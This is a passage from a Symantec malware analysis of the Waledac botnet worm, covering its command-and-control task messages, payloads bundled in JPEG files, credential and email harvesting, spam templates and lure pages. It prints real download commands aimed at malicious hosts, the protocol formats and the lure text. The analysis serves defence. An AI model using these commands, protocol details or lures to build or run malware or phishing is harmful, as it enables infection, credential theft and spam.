          88C6            MOV EAX,ESI
          59              POP ECX
          C3              RETN
```
**Jump table of later variants of Waledac**

transaction by reporting its node label and Windows system version. The relay node simply sends back an acknowledgment receipt. Afterwards, the slave node performs a *notify* routine task by sending startup and run times information. In exchange, it receives commands and other configuration data from the relay node. Next, the slave node executes a *taskreq* operation by requesting for a spamming task, and the relay node responds by sending spam templates related to one or more spamming tasks. The templates sent by the relay node include an email template and a list of components or word lists available. This will then prompt the slave node to carry out multiple *words* transactions by sending one request for each word list. In response, the relay node transmits back each word list that was requested. After a spamming task is finished, a slave node performs a *taskrep* trans-action by sending a report indicating which target email addresses were successfully spammed or not. It receives another acknowledgment receipt as a response.

Meanwhile, the slave node may also send messages anytime containing email addresses harvested during an *emails* task routine. Aside from this, it may also send login credentials that it managed to collect during a *creds* operation. For both cases, the relay node responds with an acknowledgment receipt.

On the other hand, a relay node also has the additional task of sending a report to the C&C server about connections that were made to it while acting as a proxy server. This is done through the *httpstats* task message. The report will contain information like the file requested, as well as the IP address and user-agent of the requester.

In the sections that follow, some of the tasks, namely *notify*, *taskreq*, *words*, *emails*, and *creds*, will be discussed in more detail.

## Notify Task Message

During a "notify" message exchange, a Waledac node receives configuration data and commands like the ones shown in figure 10. One such data is the IP address of the SMTP server that a slave node connects to when performing its spamming task. In addition to receiving the same configuration data sent to a slave node, a relay node may also receive domain names of DNS zones and IP addresses of DNS hosts. There is also indication that a relay node may receive a list of connection requests to deny or blacklist, although at the time of writing I was unabe to verify that.

Figure 10
**Snapshot of a sample notify message received by a slave node**



It may also receive a download or update command through the "commands" attribute in the *notify* XML message. The command items are delimited with a pipe character and have the format illustrated in figure 11.

In addition, when the given command is successfully executed, the command ID will be stored in the registry as a hexadecimal value of the Last-CommandID.

Figure 11
**Basic format of a download or update command**

<ID>|<type>|<link>

*Example:*
340|download|http://usabreakingnews.com/<filename>.jpg

## Bundled JPEG Download

One of W32.Waledac's download abilities is to download a specially crafted JPEG image file. A binary file is appended after the end of the JPEG image file, but the JPEG image will render as an image in most image browsers.

symantec. Security Response

W32.Waledac

The worm tries to hide the presence of the binary file attached at the bottom of the image file by XOR-encoding it. An example of an XOR-decoded binary is shown in figure 12 below. The executable is extracted from the end of the JPEG file, the image data is discarded, and the executable is decoded and executed. In the sample shown in figure 12, the decoded executable is an updated version of W32.Waledac. It is interesting how this executable update is only obfuscated with one layer using UPX compression. Normally, we see the W32.Waledac samples wrapped with multiple layers of encryption and protection, besides UPX compression. The sample in figure 12 suggests that Waledac updates downloaded through a command in a notify message are not as heavily encrypted, compared to bot agent binaries obtained through a download link that came from a propagation campaign spam.

Figure 12

## A sample of the JPG bundled binary in its encrypted and decrypted form



One other example of the JPG bundled binaries that are currently downloaded and installed by Waledac, is a Nullsoft installer (NSIS) for WinPcap, a Windows packet capture library. WinPcap is not malicious by itself, but the library gives a bot master the ability to view a victim's network traffic. Waledac uses it to sniff for FTP, POP3, SMTP, and HTTP traffic so that it can steal login information. The stolen login data is then transmitted to the bot master through the previously mentioned creds task message.

Furthermore, one slave node may be commanded to download a file that is different from that of another slave node. One node might receive a command to download a JPEG file bundled with a Winpcap installer, while another node might be commanded to download a JPEG file bundled with an update of Waledac instead.

## Fake AV Download

Another type of file being downloaded by Waledac is an installer for a Fake AV application (a.k.a. Scareware or Rogue AV). In this case, the file downloaded is a pure executable binary and is not bundled with a JPEG file. However, Waledac attempts to protect the Fake AV installer from file-based detections again using server-side polymorphism.

An example of this misleading application is MS AntiSpyware 2009[8]. These types of application try to convince the user to install a fake security application by showing them false infection warnings. This could mean that the Waledac author/authors are making use of an affiliate program. They may have leased a part of their botnet to distribute the misleading applications.

## More on download-or-update commands

At the moment, Waledac is capable of executing eight different types of download-or-update commands, namely *update, updateexe, download, downloadexe, downloadR, downloadrexe, downloadS,* and *downloadSexe*. So far, we have seen three of those being actively carried out. The following shows some specific examples of the commands that we have observed being sent down to the nodes while monitoring Waledac. It also indicates what kind of file the commands downloaded during that time. Of course, there is a possibility that Waledac may choose a different kind of file to distribute in the future.

### Example 1: The "update" command
This downloads a .jpg file bundled with an update of W32.Waledac.
252|update|http://91.205.[REMOVED]/pr/pic/mirabella.jpg

### Example 2: The "download" command
These commands downloaded a .jpg file bundled with a WinPcap installer.

- 340|download|http://usa[REMOVED]/win.jpg
- 340|download|http://best[REMOVED]/win.jpg
- 341|download|http://best[REMOVED]/win.jpg
- 342|download|http://mios[REMOVED]/win.jpg
- 351|download|http://mios[REMOVED]/win.jpg

### Example 3: The "downloadexe" command
These commands downloaded a FakeAV installer.

- 341|downloadexe|http://best[REMOVED]/n1.exe
- 342|downloadexe|http://mios[REMOVED]/n1.exe
- 351|downloadexe|http://mios[REMOVED]/n1.exe

## taskreq and words task messages

The components of a Waledac spam are taken mainly from the *taskreq* and *words* task messages. The email template and list of recipient addresses can be found inside the taskreq message. The email template is base64-encoded inside the body attribute, but the rest of the contents of the tasqreq message are plain text. The major components of the email template are taken from the *words* messages that follow after the *taskreq* message. The *words* message contain a list of strings that are used to fill the major variables in the email template. The list is requested based on the email template. For example, if the email template provided by the *taskreq* message contains a variable named pharma, the slave node sends a request for a *words* list named pharma. The relay node then sends back the pharma list and the slave node uses it to construct the spam email. An example of a taskreq message is shown in figure 13 on page 16.

symantec. | Security Response

W32.Waledac

The word lists can either be of a general type or spam-specific type. The general word list is mostly used for the contents of the email headers (see table 4 for examples). Notice that they are mostly just lists of names, domains, or versions that we typically see in email headers. We often see these lists being reused in more than one spam campaign. Except for domains, most of the general words lists are rarely changed or may not even be changed at all.

| Table 4 | |
|---|---|
| **Examples of general word lists** | |
| **Word Name** | **Description** |
| mynames, surnames, names | A list of names that can be used in the From field of the spam email |
| domains | A list of domains used in the header of the spam email (i.e. in the Message-ID field) |
| charset, trunver, svcver, outver. outver.6, outver.5, sendmailver | A list of character set and version numbers used for the email header |

On the other hand, the spam-specific word list is used only for the specific spam campaign it was designed for. Once a specific spam campaign is over, we usually do not see this lists being used by Waledac to construct its spam anymore. Table 5 shows samples of lists that are specific to a spam campaign. For example, the pharma and pharma_links contains strings or links that are found only in W32.Waledac's pharmaceutical spam campaign.

| Table 5 | |
|---|---|
| **Examples of spam-specific word lists** | |
| **Word Name** | **Target Spam Campaigns** |
| cupo_string, cupo_link | Specific to propagation spams such as fake bomb news and fake SMS tools |
| pharma, pharma_links | Performance-enhancing pharmaceuticals |
| tom4, tomlink, tomsubj | Online casino games and ad referrals/affiliates |

Moreover, a specific spam campaign may also have more than one email template. Combined with the contents of the email being randomly chosen from word lists, this means that a Waledac spam can have many possible combinations. It is obviously an additional attempt to further evade detection or spam traps.

## The emails and creds messages

Both of these tasks basically just involve sending stolen data back to the botnet commander. We mentioned earlier that W32.Waledac searches the fixed and removable drives for email addresses except for files with the name extensions shown in table 1. After executing this task, Waledac sends the harvested email addresses through the *emails* task message. What does the malware do with the data? We believe that these email addresses eventually get added to the list of spam targets that are distributed to the nodes.

In the meantime, a *creds* message is sent whenever the malware manages to capture login information while monitoring FTP, POP3, SMTP, and HTTP traffic. The information sent will contain the username, password, server type, and server IP address. There is speculation that the login data is being used by the people behind W32.Waledac to gain access to the servers and then hijack them for their own use.

Figure 13

## Snapshot of a sample taskreq message received by a slave node



symantec. Security Response

W32.Waledac

# Appendix A

## *Gallery of websites used in W32.Waledac's propagation campaigns*

Figure 14

**The Christmas ecard campaign**



Figure 15

**The SMS tool campaign**



Get Your Free 30-Day Trial!

 Do you want to test your partner or just to read somebody's SMS? This program is exactly what you need then! It's so easy! You don't need to install it at the mobile phone of your partner. Just download the program and you will able to read all SMS when you are online. Be aware of everything! This is an extremely new service!

Download Free Trial

© SMS Spy. All rights reserved.

symantec. | Security Response

W32.Waledac

Figure 16

## The Valentines campaign



Just in case you haven't noticed yet - Valentine's Day is coming soon. So don't forget to get some flowers, a cute present or a nicely designed Valentines Card for your sweetheart. So make sure you grab the Valentine Devkit and get started.

Have fun and Happy Valentine's day to all of you. Download Devkit.

Figure 17

## The Obama presidency campaign



Figure 18

### The dirty bomb news campaign

Logo of a prominent news wire service

### Powerful explosion burst in San Pablo this morning.

At least 12 people have been killed and more than 40 wounded in a
bomb blast near market in San Pablo. Authorities suggested that
explosion was caused by "dirty" bomb. Police said the bomb was
detonated from close by using electric cables. "It was awful" said
the eyewitness about blast that he heard from his shop. "It made the
floor shake. So many people were running"
Until now there has been no claim of responsibility.


You need the latest Flash player to view video content. Click here
to download

symantec. Security Response W32.Waledac

Figure 19
## Couponizer campaign



HOME | ABOUT | ORDER | COUPONS | NEWSLETTER | LINKS | TESTIMONIALS | JOIN OUR TEAM |      | CONTACT US



Exclusive sale coupons and deals at over 100 000 stores.
You can find these amazing sale offers and coupons ONLY HERE!
You can download free online and printable coupon list.
Click Image Below for coupons!



In our list there are most popular stores, restaurants and companies
with discounts up to 95%. We help you to survive this crisis!

Figure 20
## 4th of July campaign

 Colorful Independence Day events took place throughout the country

This year July 4th firework's shows were surprisingly amazing. The largest firework happend this Saturday.
Unprecedented sum of money was spent on this fabulous show even despite crisis. The American Pyrotechnics
Association has named South Shore's Fourth of July fireworks show as the best pyrotechnic displays in the nation.
If you want to see this fantastic show just click on the video below and press "Run"



© 2009 YouTube, LLC

# Appendix B

## *HTTP POST request and response formats*

**Table 6**
### Basic format for encrypted IP list message exchange

POST / HTTP/1.1
Referer: Mozilla
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Request-Kind-Code: [NODES|SERVERS]
User-Agent: Mozilla
Host: [IP ADDRESS]
Content-Length: [LENGTH]
Pragma: no-cache
[OBFUSCATED MESSAGE]

HTTP/1.1 200 OK
Server: Apache 1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: [LENGTH]
[OBFUSCATED MESSAGE]

**Table 7**
### Basic format for an encrypted task message exchange

POST /[RANDOM FILENAME].[PNG|HTM] HTTP/1.1
Referer: Mozilla
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla
Host: [IP ADDRESS]
Content-Length: [LENGTH]
Pragma: no-cache
a= [OBFUSCATED MESSAGE]&b=[BASE64 ENCODED DATA]

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: [DATE]
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Content-Length: [LENGTH]
[OBFUSCATED MESSAGE]

**Table 8**
### Basic format for a download or update request and response

GET /[RANDOM FILENAME].jpg HTTP/1.1
User-Agent: Mozilla
Host: [DOMAIN NAME] POST / HTTP/1.1

HTTP/1.1 200 OK
Server: nginx/0.6.33
Date: [DATE]
Content-Type: image/jpeg
Connection: keep-alive
Content-Length: [LENGTH]
Last-Modified: [DATE]
Accept-Ranges: bytes
[JPEG FILE WITH A BUNDLED BINARY OR AN EXECUTABLE]

symantec. | Security Response

Table 9

## Basic format for an index.php request and response

GET / index.php HTTP/1.1
User-Agent: Mozilla
Host: [DOMAIN NAME]

HTTP/1.1 200 OK
Server: nginx/0.6.33 | nginx/0.6.34
Date: [DATE]
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Content-Length: [LENGTH]
[OBFUSCATED MESSAGE]

# Appendix C

**Table 10**

## Task Message Contents

| TaskID | Task Type | HTTP POST Message Contents |
|---|---|---|
| 0xFF | getkey | Sent: "getkey" task name, version number, node ID, node type<br>Attributes:<br>"cert" = a new X.509 or self-signed certificate containing a 1024-bit RSA public key in PEM format<br>Received: version number, "getkey" task name,<br>Attributes:<br>"key" = base64 encoded, RSA encrypted session key |
| 0x01 | first | Sent: "first" task name, version number , node ID, node type<br>Attributes:<br>label = label name<br>winver = windows system version number (majorver.minver.subver format)<br>Received: version number, "first" task name<br>*Currently just acts as an acknowledgment or receipt* |
| 0x02 | notify | Sent: "notify" task name, version number, node ID, node type<br>Attributes:<br>"label" = label name<br>"time_init" = initial startup date and time<br>"time_now" = current date and time<br>"time_sys" = system date and time<br>"time_ticks" = current tickcount<br>Received: version number, "notify" task name<br>Attributes:<br>"ptr" = server name<br>"ip" = system IP address<br>"dns_ip" = DNS server IP address<br>"smtp_ip" = SMTP server IP address<br>"http_cache_timeout" = cache timeout value<br>"sender_threads" = number of sender threads<br>"sender_queue" = sender queue number<br>"commands" = command ID, command, command parameters (see Command Types section this document for more information)<br>"Short_logs" = a boolean flag; enable/disable short logs?<br>"dns_zones" = domain names for DNS zones<br>"dns_hosts" = IP addresses for DNS hosts<br>"socks5" = IP addresses for scoks5 proxies and their maximum allowed connections<br>"dos" = possible targets of DOS attack<br>"filter" = possible blacklisted IP addresses |
| 0x03 | taskreq | Sent: "taskreq" task name, version number, node ID<br>Received: version number, "taskreq" task name<br>Attributes:<br>id = task id number<br>body = base64 encoded email template<br>a = email address<br>w = spam component list name and timestamp |
| 0x04 | words | Sent: "words" task name, version number, node ID<br>Received: version number, "words" task name<br>Attributes:<br>word:<br>name = name of the word list<br>*A list of strings or words use to fill up variables in the email template given in taskreq* |

symantec. Security Response

W32.Waledac

| 0x05 | taskrep | Sent: "taskrep" task name, version number, node ID<br>Attributes:<br>b64 = set to true if data uses base64 encoding<br>reports:<br>id = task id number<br>rep = OK if successfully spammed, otherwise ERR<br>rcpt = encoded email address<br>Received: version number, "taskrep" task name<br>*Currently just acts as an acknowledgment or receipt* |
|------|---------|----|
| 0x06 | httpstats | Sent: "httpstats" task name, version number, node ID<br>Attributes:<br>b64 = set to true if data uses base64 encoding<br>https_stats:<br>stat = user-agent info<br>ip = ip address of system that connected<br>time = access time<br>Received: version number, "httpstats" task name<br>*Currently just acts as an acknowledgment or receipt* |
| 0x07 | emails | Sent: "emails" task name, version number, node ID, node type<br>Attributes:<br>emails = list of harvested email addresses<br>Received: version number, "emails" task name<br>*Currently just acts as an acknowledgment or receipt* |
| 0x08 | creds | Sent: "creds" task name, version number, node ID, node type<br>Attributes:<br>creds = base64 encoded data containing stolen login credentials;<br>The decoded information follows this format<br>Server Type://Username:Password@IPaddress<br>Received: version number, "creds" task name<br>*Currently just acts as an acknowledgment or receipt* |

# References

1. Liam O'Murchu. "Merry Christmas from Arnold Schwarzenegger! (?)". December 29, 2008. https://forums2.symantec.com/t5/Malicious-Code/Merry-Christmas-from-Arnold-Schwarzenegger/ba-p/375137
2. Scott Molenkamp. "Where's Waledac?". April 14, 2009. http://blogs.technet.com/mmpc/archive/2009/04/14/wheres-waledac.aspx
3. Brian Ewell. "Downadup + Waledac?". April 8, 2009. https://forums2.symantec.com/t5/Malicious-Code/Downadup-Waledac/ba-p/393454
4. Patrick Fitzgerald, "Waledac Shifts Gears", February 9, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/239
5. Peter Coogan. "Waledac – Guess which one is for you?". January 23, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/232#M232
6. Zulfikar Ramzan. "Online Miscreants Swept Away by Obamania". January 19, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/136
7. Dermot Harnett. ""Take care about yourself!" and Avoid Terror-Related Malware Spam". March 18, 2009. https://forums2.symantec.com/t5/Spam/quot-Take-care-about-yourself-quot-and-Avoid-Terror-Related/ba-p/393303
8. Patrick Fitzgerald, "Waledac Shifts Gears", February 9, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/239

symantec. Security Response

W32.Waledac

# Bibliography

1.  S. Josefsson, "The Base16, Base32, and Base64 Data Encodings", RFC 4648. October 2006. http://www.ietf.org/rfc/rfc4648.txt.
2.  Julian Seward, "bzip2 and libbzip2 , version 1.0.5: A program and library for data compression". 1996-2007. Pp.3-4,11.
3.  http://www.bzip.org/1.0.5/bzip2-manual-1.0.5.pdf
4.  Wikipedia Project. "bzip2", File format section. http://en.wikipedia.org/wiki/Bzip2#File_format.
5.  National Institute of Standards and Technology (NIST), "Specification for the Advanced Encryption Standard (AES)", (FIPS PUB 197). November 26, 2001. http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf
6.  Nick Galbreath. "Cryptography for Internet and Database Applications". Wiley; 1st edition (July 15, 2002). P.51.
7.  RSA Laboratories, "PKCS #1 v2.1: RSA Cryptography Standard". June 14, 2002. ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1.pdf.
8.  X.509. http://en.wikipedia.org/wiki/X.509.
9.  Peter Gutmann, University of Auckland. "Everything you Never Wanted to Know about PKI but were Forced to Find Out". http://www.cs.auckland.ac.nz/~pgut001/pubs/pkitutorial.pdf
10. OpenSSL Project. http://www.openssl.org.
11. Liam O'Murchu. "Merry Christmas from Arnold Schwarzenegger! (?)". December 29, 2008. https://forums2.symantec.com/t5/Malicious-Code/Merry-Christmas-from-Arnold-Schwarzenegger/ba-p/375137
12. Zulfikar Ramzan. "Online Miscreants Swept Away by Obamania". January 19, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/136
13. Peter Coogan. "Waledac – Guess which one is for you?". January 23, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/232#M232
14. Dermot Harnett. ""Take care about yourself!" and Avoid Terror-Related Malware Spam". March 18, 2009. https://forums2.symantec.com/t5/Spam/quot-Take-care-about-yourself-quot-and-Avoid-Terror-Related/ba-p/393303
15. Patrick Fitzgerald, "Waledac Shifts Gears", February 9, 2009. https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/239
16. Brian Ewell. "Downadup + Waledac?". April 8, 2009. https://forums2.symantec.com/t5/Malicious-Code/Downadup-Waledac/ba-p/393454
17. Joe Stewart. "Rogue Antivirus Dissected - Part 2". October 22, 2008 . http://www.secureworks.com/research/threats/rogue-antivirus-part-2/.
18. Scott Molenkamp. "Where's Waledac?". April 14, 2009. http://blogs.technet.com/mmpc/archive/2009/04/14/wheres-waledac.aspx

Any technical information that is made available by Symantec Corporation is the copyrighted work of Symantec Corporation and is owned by Symantec Corporation.

NO WARRANTY . The technical information is being delivered to you as is and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the technical documentation or the information contained herein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical errors. Symantec reserves the right to make changes without prior notice.

**About Symantec**

Symantec is a global leader in providing security, storage and systems management solutions to help businesses and consumers secure and manage their information. Headquartered in Cupertino, Calif., Symantec has operations in more than 40 countries. More information is available at www.symantec.com.

**About the author**

Gilou Tenebro is an engineer with expertise in reverse engineering malicious code, located in Symantec Security Response's Culver City office.

For specific country offices and contact numbers, please visit our Web site. For product information in the U.S., call toll-free 1 (800) 745 6054.

Symantec Corporation
World Headquarters
20330 Stevens Creek Blvd.
Cupertino, CA 95014 USA
+1 (408) 517 8000
1 (800) 721 3934
www.symantec.com

Copyright © 2009 Symantec Corporation. All rights reserved. Symantec and the Symantec logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

# Exhibit B

Waledac Stats











**Target of Infection Attempts, last 12 months**

- United States
- Japan
- United Kingdom
- Canada
- Netherlands
- Australia
- France
- Germany
- India
- Belgium
- Turkey
- Italy
- Brazil
- Mexico
- Norway
- Other

Total distinct IP's seen so far in 2010 performing Waledac-related activities (hosting Waledac, C&C traffic, etc): 23,379

Total infection attempts seen in the last 12 months: 217,821